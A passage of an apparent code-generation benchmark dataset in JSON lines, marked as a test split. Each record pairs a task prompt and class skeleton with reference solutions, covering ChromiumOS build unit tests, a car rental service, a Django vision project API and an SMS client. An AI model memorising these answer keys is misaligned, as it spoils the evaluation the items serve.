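    return VISITORS[(dialect, kind)](column)

col = {'table': 'accounts', 'name': 'balance'}
print(run_visitor('sqlite', 'columngenerator', col))  # the ADD COLUMN statement
print(run_visitor('sqlite', 'columndropper', col))    # the DROP COLUMN statement
```

Keying the registry on (dialect, operation) is what lets one Column-level API emit different DDL per backend.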
self.assertTrue(operation_run.called)\n<|end_body_0|>\n\n<|body_start_1|>\n cmd = ['--board=randonname', 'power_manager']\n self.PatchObject(workon_helper, 'WorkonHelper')\n self.PatchObject(command, 'UseProgressBar', return_value=False)\n with MockBuildCommand(cmd) as build:\n operation_run = self.PatchObject(cros_build.BrilloBuildOperation, 'Run')\n build.inst.Run()\n self.assertFalse(operation_run.called)\n<|end_body_1|>\n\n<|body_start_2|>\n cmds = [['--host', 'power_manager'], ['--board=randomname', 'power_manager'], ['--board=randomname', '--debug', 'power_manager'], ['--board=randomname', '--no-deps', 'power_manager'], ['--board=randomname', '--no-chroot-update', 'power_manager'], ['--board=randomname', '--no-enable-only-latest', 'power_manager']]\n for cmd in cmds:\n update_chroot = not ('--no-deps' in cmd or '--no-chroot-update' in cmd)\n enable_only_latest = '--no-enable-only-latest' not in cmd\n fake_workon_helper = FakeWorkonHelper()\n self.PatchObject(workon_helper, 'WorkonHelper', return_value=fake_workon_helper)\n with MockBuildCommand(cmd) as build:\n build.inst.Run()\n self.assertEquals(1 if update_chroot else 0, build.chroot_update_called)\n self.assertEquals(1 if enable_only_latest else 0, fake_workon_helper.start_called)\n self.assertEquals(True if enable_only_latest else None, fake_workon_helper.use_workon_only)\n<|end_body_2|>\n\n<|body_start_3|>\n args = ['--board=randomname', 'power_manager']\n self.PatchObject(workon_helper, 'WorkonHelper', return_value=FakeWorkonHelper())\n with MockBuildCommand(args) as build:\n cmd = partial_mock.In('--backtrack=0')\n build.rc_mock.AddCmdResult(cmd=cmd, returncode=1, error='error\\n')\n with self.OutputCapturer():\n try:\n build.inst.Run()\n except Exception as e:\n logging.error(e)\n self.AssertOutputContainsError(cros_build.BuildCommand._BAD_DEPEND_MSG, check_stderr=True)\n<|end_body_3|>\n", "class_docstring": "Test class for our BuildCommand class.", "class_name": "BuildCommandTest", "detected_licenses": ["BSD-3-Clause", "LicenseRef-scancode-unknown-license-reference", "LGPL-2.0-or-later", "GPL-1.0-or-later", "MIT", "Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass BuildCommandTest:\n \"\"\"Test class for our BuildCommand class.\"\"\"\n\n def testBrilloBuildOperationCalled(self):\n \"\"\"Test that BrilloBuildOperation is used when appropriate.\"\"\"\n <|body_0|>\n\n def testBrilloBuildOperationNotCalled(self):\n \"\"\"Test that BrilloBuildOperation is not used when it shouldn't be.\"\"\"\n <|body_1|>\n\n def testSuccess(self):\n \"\"\"Test that successful commands work.\"\"\"\n <|body_2|>\n\n def testFailedDeps(self):\n \"\"\"Test that failures are detected correctly.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n cmd = ['--board=randonname', 'power_manager']\n self.PatchObject(workon_helper, 'WorkonHelper')\n self.PatchObject(command, 'UseProgressBar', return_value=True)\n with MockBuildCommand(cmd) as build:\n operation_run = self.PatchObject(cros_build.BrilloBuildOperation, 'Run')\n build.inst.Run()\n self.assertTrue(operation_run.called)\n<|end_body_0|>\n\n<|body_start_1|>\n cmd = ['--board=randonname', 'power_manager']\n self.PatchObject(workon_helper, 'WorkonHelper')\n self.PatchObject(command, 'UseProgressBar', return_value=False)\n with MockBuildCommand(cmd) as build:\n operation_run = self.PatchObject(cros_build.BrilloBuildOperation, 'Run')\n build.inst.Run()\n self.assertFalse(operation_run.called)\n<|end_body_1|>\n\n<|body_start_2|>\n cmds = 
[['--host', 'power_manager'], ['--board=randomname', 'power_manager'], ['--board=randomname', '--debug', 'power_manager'], ['--board=randomname', '--no-deps', 'power_manager'], ['--board=randomname', '--no-chroot-update', 'power_manager'], ['--board=randomname', '--no-enable-only-latest', 'power_manager']]\n for cmd in cmds:\n update_chroot = not ('--no-deps' in cmd or '--no-chroot-update' in cmd)\n enable_only_latest = '--no-enable-only-latest' not in cmd\n fake_workon_helper = FakeWorkonHelper()\n self.PatchObject(workon_helper, 'WorkonHelper', return_value=fake_workon_helper)\n with MockBuildCommand(cmd) as build:\n build.inst.Run()\n self.assertEquals(1 if update_chroot else 0, build.chroot_update_called)\n self.assertEquals(1 if enable_only_latest else 0, fake_workon_helper.start_called)\n self.assertEquals(True if enable_only_latest else None, fake_workon_helper.use_workon_only)\n<|end_body_2|>\n\n<|body_start_3|>\n args = ['--board=randomname', 'power_manager']\n self.PatchObject(workon_helper, 'WorkonHelper', return_value=FakeWorkonHelper())\n with MockBuildCommand(args) as build:\n cmd = partial_mock.In('--backtrack=0')\n build.rc_mock.AddCmdResult(cmd=cmd, returncode=1, error='error\\n')\n with self.OutputCapturer():\n try:\n build.inst.Run()\n except Exception as e:\n logging.error(e)\n self.AssertOutputContainsError(cros_build.BuildCommand._BAD_DEPEND_MSG, check_stderr=True)\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000038", "length_bytes": 4632, "license_type": "permissive", "methods": [{"docstring": "Test that BrilloBuildOperation is used when appropriate.", "name": "testBrilloBuildOperationCalled", "signature": "def testBrilloBuildOperationCalled(self)"}, {"docstring": "Test that BrilloBuildOperation is not used when it shouldn't be.", "name": "testBrilloBuildOperationNotCalled", "signature": "def testBrilloBuildOperationNotCalled(self)"}, {"docstring": "Test that successful commands work.", "name": "testSuccess", "signature": "def testSuccess(self)"}, {"docstring": "Test that failures are detected correctly.", "name": "testFailedDeps", "signature": "def testFailedDeps(self)"}], "n_methods": 4, "prompt": "Implement the Python class `BuildCommandTest` described below.\n\nClass description:\nTest class for our BuildCommand class.\n\nMethod signatures and docstrings:\n- def testBrilloBuildOperationCalled(self): Test that BrilloBuildOperation is used when appropriate.\n- def testBrilloBuildOperationNotCalled(self): Test that BrilloBuildOperation is not used when it shouldn't be.\n- def testSuccess(self): Test that successful commands work.\n- def testFailedDeps(self): Test that failures are detected correctly.", "prompted_full_text": "Implement the Python class `BuildCommandTest` described below.\n\nClass description:\nTest class for our BuildCommand class.\n\nMethod signatures and docstrings:\n- def testBrilloBuildOperationCalled(self): Test that BrilloBuildOperation is used when appropriate.\n- def testBrilloBuildOperationNotCalled(self): Test that BrilloBuildOperation is not used when it shouldn't be.\n- def testSuccess(self): Test that successful commands work.\n- def testFailedDeps(self): Test that failures are detected correctly.\n\n<|skeleton|>\nclass BuildCommandTest:\n \"\"\"Test class for our BuildCommand class.\"\"\"\n\n def testBrilloBuildOperationCalled(self):\n \"\"\"Test that BrilloBuildOperation is used when appropriate.\"\"\"\n <|body_0|>\n\n def testBrilloBuildOperationNotCalled(self):\n \"\"\"Test that BrilloBuildOperation is not used when it 
shouldn't be.\"\"\"\n <|body_1|>\n\n def testSuccess(self):\n \"\"\"Test that successful commands work.\"\"\"\n <|body_2|>\n\n def testFailedDeps(self):\n \"\"\"Test that failures are detected correctly.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n cmd = ['--board=randonname', 'power_manager']\n self.PatchObject(workon_helper, 'WorkonHelper')\n self.PatchObject(command, 'UseProgressBar', return_value=True)\n with MockBuildCommand(cmd) as build:\n operation_run = self.PatchObject(cros_build.BrilloBuildOperation, 'Run')\n build.inst.Run()\n self.assertTrue(operation_run.called)\n<|end_body_0|>\n\n<|body_start_1|>\n cmd = ['--board=randonname', 'power_manager']\n self.PatchObject(workon_helper, 'WorkonHelper')\n self.PatchObject(command, 'UseProgressBar', return_value=False)\n with MockBuildCommand(cmd) as build:\n operation_run = self.PatchObject(cros_build.BrilloBuildOperation, 'Run')\n build.inst.Run()\n self.assertFalse(operation_run.called)\n<|end_body_1|>\n\n<|body_start_2|>\n cmds = [['--host', 'power_manager'], ['--board=randomname', 'power_manager'], ['--board=randomname', '--debug', 'power_manager'], ['--board=randomname', '--no-deps', 'power_manager'], ['--board=randomname', '--no-chroot-update', 'power_manager'], ['--board=randomname', '--no-enable-only-latest', 'power_manager']]\n for cmd in cmds:\n update_chroot = not ('--no-deps' in cmd or '--no-chroot-update' in cmd)\n enable_only_latest = '--no-enable-only-latest' not in cmd\n fake_workon_helper = FakeWorkonHelper()\n self.PatchObject(workon_helper, 'WorkonHelper', return_value=fake_workon_helper)\n with MockBuildCommand(cmd) as build:\n build.inst.Run()\n self.assertEquals(1 if update_chroot else 0, build.chroot_update_called)\n self.assertEquals(1 if enable_only_latest else 0, fake_workon_helper.start_called)\n self.assertEquals(True if enable_only_latest else None, fake_workon_helper.use_workon_only)\n<|end_body_2|>\n\n<|body_start_3|>\n args = ['--board=randomname', 'power_manager']\n self.PatchObject(workon_helper, 'WorkonHelper', return_value=FakeWorkonHelper())\n with MockBuildCommand(args) as build:\n cmd = partial_mock.In('--backtrack=0')\n build.rc_mock.AddCmdResult(cmd=cmd, returncode=1, error='error\\n')\n with self.OutputCapturer():\n try:\n build.inst.Run()\n except Exception as e:\n logging.error(e)\n self.AssertOutputContainsError(cros_build.BuildCommand._BAD_DEPEND_MSG, check_stderr=True)\n<|end_body_3|>\n", "revision_id": "72a05af97787001756bae2511b7985e61498c965", "skeleton": "<|skeleton|>\nclass BuildCommandTest:\n \"\"\"Test class for our BuildCommand class.\"\"\"\n\n def testBrilloBuildOperationCalled(self):\n \"\"\"Test that BrilloBuildOperation is used when appropriate.\"\"\"\n <|body_0|>\n\n def testBrilloBuildOperationNotCalled(self):\n \"\"\"Test that BrilloBuildOperation is not used when it shouldn't be.\"\"\"\n <|body_1|>\n\n def testSuccess(self):\n \"\"\"Test that successful commands work.\"\"\"\n <|body_2|>\n\n def testFailedDeps(self):\n \"\"\"Test that failures are detected correctly.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class BuildCommandTest:\n \"\"\"Test class for our BuildCommand class.\"\"\"\n\n def testBrilloBuildOperationCalled(self):\n \"\"\"Test that BrilloBuildOperation is used when appropriate.\"\"\"\n cmd = ['--board=randonname', 'power_manager']\n self.PatchObject(workon_helper, 'WorkonHelper')\n self.PatchObject(command, 'UseProgressBar', 
return_value=True)\n with MockBuildCommand(cmd) as build:\n operation_run = self.PatchObject(cros_build.BrilloBuildOperation, 'Run')\n build.inst.Run()\n self.assertTrue(operation_run.called)\n\n def testBrilloBuildOperationNotCalled(self):\n \"\"\"Test that BrilloBuildOperation is not used when it shouldn't be.\"\"\"\n cmd = ['--board=randonname', 'power_manager']\n self.PatchObject(workon_helper, 'WorkonHelper')\n self.PatchObject(command, 'UseProgressBar', return_value=False)\n with MockBuildCommand(cmd) as build:\n operation_run = self.PatchObject(cros_build.BrilloBuildOperation, 'Run')\n build.inst.Run()\n self.assertFalse(operation_run.called)\n\n def testSuccess(self):\n \"\"\"Test that successful commands work.\"\"\"\n cmds = [['--host', 'power_manager'], ['--board=randomname', 'power_manager'], ['--board=randomname', '--debug', 'power_manager'], ['--board=randomname', '--no-deps', 'power_manager'], ['--board=randomname', '--no-chroot-update', 'power_manager'], ['--board=randomname', '--no-enable-only-latest', 'power_manager']]\n for cmd in cmds:\n update_chroot = not ('--no-deps' in cmd or '--no-chroot-update' in cmd)\n enable_only_latest = '--no-enable-only-latest' not in cmd\n fake_workon_helper = FakeWorkonHelper()\n self.PatchObject(workon_helper, 'WorkonHelper', return_value=fake_workon_helper)\n with MockBuildCommand(cmd) as build:\n build.inst.Run()\n self.assertEquals(1 if update_chroot else 0, build.chroot_update_called)\n self.assertEquals(1 if enable_only_latest else 0, fake_workon_helper.start_called)\n self.assertEquals(True if enable_only_latest else None, fake_workon_helper.use_workon_only)\n\n def testFailedDeps(self):\n \"\"\"Test that failures are detected correctly.\"\"\"\n args = ['--board=randomname', 'power_manager']\n self.PatchObject(workon_helper, 'WorkonHelper', return_value=FakeWorkonHelper())\n with MockBuildCommand(args) as build:\n cmd = partial_mock.In('--backtrack=0')\n build.rc_mock.AddCmdResult(cmd=cmd, returncode=1, error='error\\n')\n with self.OutputCapturer():\n try:\n build.inst.Run()\n except Exception as e:\n logging.error(e)\n self.AssertOutputContainsError(cros_build.BuildCommand._BAD_DEPEND_MSG, check_stderr=True)\n", "source": "the_stack_v2_python_sparse", "source_path": "third_party/chromite/cli/cros/cros_build_unittest.py", "source_repo": "metux/chromium-suckless", "split": "test", "star_events_count": 5} {"blob_id": "5b13fffd940cacac656b8504e7f9c5c0d540b991", "bodies": ["available_cars = []\nall_cars = self.get_full_content()\nfor car in all_cars:\n if not car.is_booked():\n available_cars.append(car)\nreturn available_cars", "booked_cars = []\nall_cars = self.get_full_content()\nfor car in all_cars:\n if car.is_booked():\n booked_cars.append(car)\nreturn booked_cars"], "bodies_text": "<|body_start_0|>\n available_cars = []\n all_cars = self.get_full_content()\n for car in all_cars:\n if not car.is_booked():\n available_cars.append(car)\n return available_cars\n<|end_body_0|>\n\n<|body_start_1|>\n booked_cars = []\n all_cars = self.get_full_content()\n for car in all_cars:\n if car.is_booked():\n booked_cars.append(car)\n return booked_cars\n<|end_body_1|>\n", "class_docstring": "", "class_name": "CarService", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CarService:\n\n def get_available_cars(self):\n \"\"\"Saekir alla bila sem eru ekki i leigu og skilar theim\"\"\"\n <|body_0|>\n\n def get_booked_cars(self):\n \"\"\"Saekir alla bila sem eru i leigu og skilar 
theim\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n available_cars = []\n all_cars = self.get_full_content()\n for car in all_cars:\n if not car.is_booked():\n available_cars.append(car)\n return available_cars\n<|end_body_0|>\n\n<|body_start_1|>\n booked_cars = []\n all_cars = self.get_full_content()\n for car in all_cars:\n if car.is_booked():\n booked_cars.append(car)\n return booked_cars\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000039", "length_bytes": 836, "license_type": "no_license", "methods": [{"docstring": "Saekir alla bila sem eru ekki i leigu og skilar theim", "name": "get_available_cars", "signature": "def get_available_cars(self)"}, {"docstring": "Saekir alla bila sem eru i leigu og skilar theim", "name": "get_booked_cars", "signature": "def get_booked_cars(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005669", "prompt": "Implement the Python class `CarService` described below.\n\nClass description:\nImplement the CarService class.\n\nMethod signatures and docstrings:\n- def get_available_cars(self): Saekir alla bila sem eru ekki i leigu og skilar theim\n- def get_booked_cars(self): Saekir alla bila sem eru i leigu og skilar theim", "prompted_full_text": "Implement the Python class `CarService` described below.\n\nClass description:\nImplement the CarService class.\n\nMethod signatures and docstrings:\n- def get_available_cars(self): Saekir alla bila sem eru ekki i leigu og skilar theim\n- def get_booked_cars(self): Saekir alla bila sem eru i leigu og skilar theim\n\n<|skeleton|>\nclass CarService:\n\n def get_available_cars(self):\n \"\"\"Saekir alla bila sem eru ekki i leigu og skilar theim\"\"\"\n <|body_0|>\n\n def get_booked_cars(self):\n \"\"\"Saekir alla bila sem eru i leigu og skilar theim\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n available_cars = []\n all_cars = self.get_full_content()\n for car in all_cars:\n if not car.is_booked():\n available_cars.append(car)\n return available_cars\n<|end_body_0|>\n\n<|body_start_1|>\n booked_cars = []\n all_cars = self.get_full_content()\n for car in all_cars:\n if car.is_booked():\n booked_cars.append(car)\n return booked_cars\n<|end_body_1|>\n", "revision_id": "c9533d91081ab5ac34467e367d10efc1c1c75746", "skeleton": "<|skeleton|>\nclass CarService:\n\n def get_available_cars(self):\n \"\"\"Saekir alla bila sem eru ekki i leigu og skilar theim\"\"\"\n <|body_0|>\n\n def get_booked_cars(self):\n \"\"\"Saekir alla bila sem eru i leigu og skilar theim\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CarService:\n def get_available_cars(self):\n \"\"\"Saekir alla bila sem eru ekki i leigu og skilar theim\"\"\"\n available_cars = []\n all_cars = self.get_full_content()\n for car in all_cars:\n if not car.is_booked():\n available_cars.append(car)\n return available_cars\n\n def get_booked_cars(self):\n \"\"\"Saekir alla bila sem eru i leigu og skilar theim\"\"\"\n booked_cars = []\n all_cars = self.get_full_content()\n for car in all_cars:\n if car.is_booked():\n booked_cars.append(car)\n return booked_cars\n", "source": "the_stack_v2_python_sparse", "source_path": "services/CarService.py", "source_repo": "superhetja/verkefni1", "split": "test", "star_events_count": 0} {"blob_id": "f80028f432062fd25b47322822d8adbb095ae004", "bodies": ["try:\n project_obj = self.get_object()\n part_id = request.query_params.get('part_id') or None\n 
part_name = request.query_params.get('part_name') or None\n if part_id is not None:\n project_obj.delete_tag_by_id(tag_id=part_id)\n return Response({'status': 'ok'})\n if part_name is not None:\n project_obj.delete_tag_by_name(tag_name=part_name)\n return Response({'status': 'ok'})\n raise AttributeError('part_name or part_id not found')\nexcept AttributeError as attr_err:\n return Response({'status': 'failed', 'log': str(attr_err)}, status=status.HTTP_400_BAD_REQUEST)\nexcept CustomVisionErrorException as customvision_err:\n return Response({'status': 'failed', 'log': str(customvision_err)}, status=status.HTTP_503_SERVICE_UNAVAILABLE)", "queryset = self.get_queryset()\nobj = get_object_or_404(queryset, pk=pk)\nobj.relabel_expired_time = timezone.now() + datetime.timedelta(seconds=PROJECT_RELABEL_TIME_THRESHOLD)\nobj.save()\nserializer = ProjectSerializer(obj)\nreturn Response(serializer.data)"], "bodies_text": "<|body_start_0|>\n try:\n project_obj = self.get_object()\n part_id = request.query_params.get('part_id') or None\n part_name = request.query_params.get('part_name') or None\n if part_id is not None:\n project_obj.delete_tag_by_id(tag_id=part_id)\n return Response({'status': 'ok'})\n if part_name is not None:\n project_obj.delete_tag_by_name(tag_name=part_name)\n return Response({'status': 'ok'})\n raise AttributeError('part_name or part_id not found')\n except AttributeError as attr_err:\n return Response({'status': 'failed', 'log': str(attr_err)}, status=status.HTTP_400_BAD_REQUEST)\n except CustomVisionErrorException as customvision_err:\n return Response({'status': 'failed', 'log': str(customvision_err)}, status=status.HTTP_503_SERVICE_UNAVAILABLE)\n<|end_body_0|>\n\n<|body_start_1|>\n queryset = self.get_queryset()\n obj = get_object_or_404(queryset, pk=pk)\n obj.relabel_expired_time = timezone.now() + datetime.timedelta(seconds=PROJECT_RELABEL_TIME_THRESHOLD)\n obj.save()\n serializer = ProjectSerializer(obj)\n return Response(serializer.data)\n<|end_body_1|>\n", "class_docstring": "Project ModelViewSet Filters: is_demo", "class_name": "ProjectViewSet", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ProjectViewSet:\n \"\"\"Project ModelViewSet Filters: is_demo\"\"\"\n\n def delete_tag(self, request, pk=None):\n \"\"\"delete tag\"\"\"\n <|body_0|>\n\n def relabel_keep_alive(self, request, pk=None) -> Response:\n \"\"\"relabel_keep_alive. 
Args: request: kwargs: Returns: Response: Return project with updated timestamp\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n project_obj = self.get_object()\n part_id = request.query_params.get('part_id') or None\n part_name = request.query_params.get('part_name') or None\n if part_id is not None:\n project_obj.delete_tag_by_id(tag_id=part_id)\n return Response({'status': 'ok'})\n if part_name is not None:\n project_obj.delete_tag_by_name(tag_name=part_name)\n return Response({'status': 'ok'})\n raise AttributeError('part_name or part_id not found')\n except AttributeError as attr_err:\n return Response({'status': 'failed', 'log': str(attr_err)}, status=status.HTTP_400_BAD_REQUEST)\n except CustomVisionErrorException as customvision_err:\n return Response({'status': 'failed', 'log': str(customvision_err)}, status=status.HTTP_503_SERVICE_UNAVAILABLE)\n<|end_body_0|>\n\n<|body_start_1|>\n queryset = self.get_queryset()\n obj = get_object_or_404(queryset, pk=pk)\n obj.relabel_expired_time = timezone.now() + datetime.timedelta(seconds=PROJECT_RELABEL_TIME_THRESHOLD)\n obj.save()\n serializer = ProjectSerializer(obj)\n return Response(serializer.data)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000040", "length_bytes": 30302, "license_type": "permissive", "methods": [{"docstring": "delete tag", "name": "delete_tag", "signature": "def delete_tag(self, request, pk=None)"}, {"docstring": "relabel_keep_alive. Args: request: kwargs: Returns: Response: Return project with updated timestamp", "name": "relabel_keep_alive", "signature": "def relabel_keep_alive(self, request, pk=None) -> Response"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003694", "prompt": "Implement the Python class `ProjectViewSet` described below.\n\nClass description:\nProject ModelViewSet Filters: is_demo\n\nMethod signatures and docstrings:\n- def delete_tag(self, request, pk=None): delete tag\n- def relabel_keep_alive(self, request, pk=None) -> Response: relabel_keep_alive. Args: request: kwargs: Returns: Response: Return project with updated timestamp", "prompted_full_text": "Implement the Python class `ProjectViewSet` described below.\n\nClass description:\nProject ModelViewSet Filters: is_demo\n\nMethod signatures and docstrings:\n- def delete_tag(self, request, pk=None): delete tag\n- def relabel_keep_alive(self, request, pk=None) -> Response: relabel_keep_alive. Args: request: kwargs: Returns: Response: Return project with updated timestamp\n\n<|skeleton|>\nclass ProjectViewSet:\n \"\"\"Project ModelViewSet Filters: is_demo\"\"\"\n\n def delete_tag(self, request, pk=None):\n \"\"\"delete tag\"\"\"\n <|body_0|>\n\n def relabel_keep_alive(self, request, pk=None) -> Response:\n \"\"\"relabel_keep_alive. 
Args: request: kwargs: Returns: Response: Return project with updated timestamp\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n project_obj = self.get_object()\n part_id = request.query_params.get('part_id') or None\n part_name = request.query_params.get('part_name') or None\n if part_id is not None:\n project_obj.delete_tag_by_id(tag_id=part_id)\n return Response({'status': 'ok'})\n if part_name is not None:\n project_obj.delete_tag_by_name(tag_name=part_name)\n return Response({'status': 'ok'})\n raise AttributeError('part_name or part_id not found')\n except AttributeError as attr_err:\n return Response({'status': 'failed', 'log': str(attr_err)}, status=status.HTTP_400_BAD_REQUEST)\n except CustomVisionErrorException as customvision_err:\n return Response({'status': 'failed', 'log': str(customvision_err)}, status=status.HTTP_503_SERVICE_UNAVAILABLE)\n<|end_body_0|>\n\n<|body_start_1|>\n queryset = self.get_queryset()\n obj = get_object_or_404(queryset, pk=pk)\n obj.relabel_expired_time = timezone.now() + datetime.timedelta(seconds=PROJECT_RELABEL_TIME_THRESHOLD)\n obj.save()\n serializer = ProjectSerializer(obj)\n return Response(serializer.data)\n<|end_body_1|>\n", "revision_id": "d72c3c1c2d56a762b74a72cd3befd076dc77b8ac", "skeleton": "<|skeleton|>\nclass ProjectViewSet:\n \"\"\"Project ModelViewSet Filters: is_demo\"\"\"\n\n def delete_tag(self, request, pk=None):\n \"\"\"delete tag\"\"\"\n <|body_0|>\n\n def relabel_keep_alive(self, request, pk=None) -> Response:\n \"\"\"relabel_keep_alive. Args: request: kwargs: Returns: Response: Return project with updated timestamp\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ProjectViewSet:\n \"\"\"Project ModelViewSet Filters: is_demo\"\"\"\n\n def delete_tag(self, request, pk=None):\n \"\"\"delete tag\"\"\"\n try:\n project_obj = self.get_object()\n part_id = request.query_params.get('part_id') or None\n part_name = request.query_params.get('part_name') or None\n if part_id is not None:\n project_obj.delete_tag_by_id(tag_id=part_id)\n return Response({'status': 'ok'})\n if part_name is not None:\n project_obj.delete_tag_by_name(tag_name=part_name)\n return Response({'status': 'ok'})\n raise AttributeError('part_name or part_id not found')\n except AttributeError as attr_err:\n return Response({'status': 'failed', 'log': str(attr_err)}, status=status.HTTP_400_BAD_REQUEST)\n except CustomVisionErrorException as customvision_err:\n return Response({'status': 'failed', 'log': str(customvision_err)}, status=status.HTTP_503_SERVICE_UNAVAILABLE)\n\n def relabel_keep_alive(self, request, pk=None) -> Response:\n \"\"\"relabel_keep_alive. 
Args: request: kwargs: Returns: Response: Return project with updated timestamp\"\"\"\n queryset = self.get_queryset()\n obj = get_object_or_404(queryset, pk=pk)\n obj.relabel_expired_time = timezone.now() + datetime.timedelta(seconds=PROJECT_RELABEL_TIME_THRESHOLD)\n obj.save()\n serializer = ProjectSerializer(obj)\n return Response(serializer.data)\n", "source": "the_stack_v2_python_sparse", "source_path": "factory-ai-vision/EdgeSolution/modules/WebModule/backend/vision_on_edge/azure_training/api/views.py", "source_repo": "timlawless/azure-intelligent-edge-patterns", "split": "test", "star_events_count": 0} {"blob_id": "639e2df453845137d4f08f8788514c4bbd16fe2e", "bodies": ["uri = '%s/sms/send' % self.uri_prefix\npost_body = {'phone': phone, 'sms': message}\npost_body = json.dumps(post_body)\nresp, body = self.post(uri, post_body)\nself.expected_success(201, resp.status)\nbody = json.loads(body)\nreturn service_client.ResponseBody(resp, body)", "uri = '%s/sms/config' % self.uri_prefix\nif kwargs:\n cfg.update(kwargs)\ncfg = json.dumps(cfg)\npost_body = {'config': cfg}\npost_body = json.dumps(post_body)\nresp, body = self.post(uri, post_body)\nself.expected_success(201, resp.status)\nbody = json.loads(body)\nreturn service_client.ResponseBody(resp, body)", "uri = '%s/sms/config' % self.uri_prefix\nresp, body = self.get(uri)\nself.expected_success(200, resp.status)\nbody = json.loads(body)\nreturn service_client.ResponseBody(resp, body)"], "bodies_text": "<|body_start_0|>\n uri = '%s/sms/send' % self.uri_prefix\n post_body = {'phone': phone, 'sms': message}\n post_body = json.dumps(post_body)\n resp, body = self.post(uri, post_body)\n self.expected_success(201, resp.status)\n body = json.loads(body)\n return service_client.ResponseBody(resp, body)\n<|end_body_0|>\n\n<|body_start_1|>\n uri = '%s/sms/config' % self.uri_prefix\n if kwargs:\n cfg.update(kwargs)\n cfg = json.dumps(cfg)\n post_body = {'config': cfg}\n post_body = json.dumps(post_body)\n resp, body = self.post(uri, post_body)\n self.expected_success(201, resp.status)\n body = json.loads(body)\n return service_client.ResponseBody(resp, body)\n<|end_body_1|>\n\n<|body_start_2|>\n uri = '%s/sms/config' % self.uri_prefix\n resp, body = self.get(uri)\n self.expected_success(200, resp.status)\n body = json.loads(body)\n return service_client.ResponseBody(resp, body)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "SfNotifySmsClient", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SfNotifySmsClient:\n\n def sms_create(self, phone, message):\n \"\"\"create sms :param phone(required): The phone number to send :param message(required): Content of short message\"\"\"\n <|body_0|>\n\n def sms_config_set(self, cfg, **kwargs):\n \"\"\"update config ini file :param cfg: dict of config like this: {section:{option:value}} :param kwargs: multiple section\"\"\"\n <|body_1|>\n\n def sms_config_get(self):\n \"\"\"get config ini file\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n uri = '%s/sms/send' % self.uri_prefix\n post_body = {'phone': phone, 'sms': message}\n post_body = json.dumps(post_body)\n resp, body = self.post(uri, post_body)\n self.expected_success(201, resp.status)\n body = json.loads(body)\n return service_client.ResponseBody(resp, body)\n<|end_body_0|>\n\n<|body_start_1|>\n uri = '%s/sms/config' % self.uri_prefix\n if kwargs:\n cfg.update(kwargs)\n cfg = json.dumps(cfg)\n post_body = {'config': cfg}\n post_body = 
json.dumps(post_body)\n resp, body = self.post(uri, post_body)\n self.expected_success(201, resp.status)\n body = json.loads(body)\n return service_client.ResponseBody(resp, body)\n<|end_body_1|>\n\n<|body_start_2|>\n uri = '%s/sms/config' % self.uri_prefix\n resp, body = self.get(uri)\n self.expected_success(200, resp.status)\n body = json.loads(body)\n return service_client.ResponseBody(resp, body)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000041", "length_bytes": 2272, "license_type": "permissive", "methods": [{"docstring": "create sms :param phone(required): The phone number to send :param message(required): Content of short message", "name": "sms_create", "signature": "def sms_create(self, phone, message)"}, {"docstring": "update config ini file :param cfg: dict of config like this: {section:{option:value}} :param kwargs: multiple section", "name": "sms_config_set", "signature": "def sms_config_set(self, cfg, **kwargs)"}, {"docstring": "get config ini file", "name": "sms_config_get", "signature": "def sms_config_get(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005286", "prompt": "Implement the Python class `SfNotifySmsClient` described below.\n\nClass description:\nImplement the SfNotifySmsClient class.\n\nMethod signatures and docstrings:\n- def sms_create(self, phone, message): create sms :param phone(required): The phone number to send :param message(required): Content of short message\n- def sms_config_set(self, cfg, **kwargs): update config ini file :param cfg: dict of config like this: {section:{option:value}} :param kwargs: multiple section\n- def sms_config_get(self): get config ini file", "prompted_full_text": "Implement the Python class `SfNotifySmsClient` described below.\n\nClass description:\nImplement the SfNotifySmsClient class.\n\nMethod signatures and docstrings:\n- def sms_create(self, phone, message): create sms :param phone(required): The phone number to send :param message(required): Content of short message\n- def sms_config_set(self, cfg, **kwargs): update config ini file :param cfg: dict of config like this: {section:{option:value}} :param kwargs: multiple section\n- def sms_config_get(self): get config ini file\n\n<|skeleton|>\nclass SfNotifySmsClient:\n\n def sms_create(self, phone, message):\n \"\"\"create sms :param phone(required): The phone number to send :param message(required): Content of short message\"\"\"\n <|body_0|>\n\n def sms_config_set(self, cfg, **kwargs):\n \"\"\"update config ini file :param cfg: dict of config like this: {section:{option:value}} :param kwargs: multiple section\"\"\"\n <|body_1|>\n\n def sms_config_get(self):\n \"\"\"get config ini file\"\"\"\n 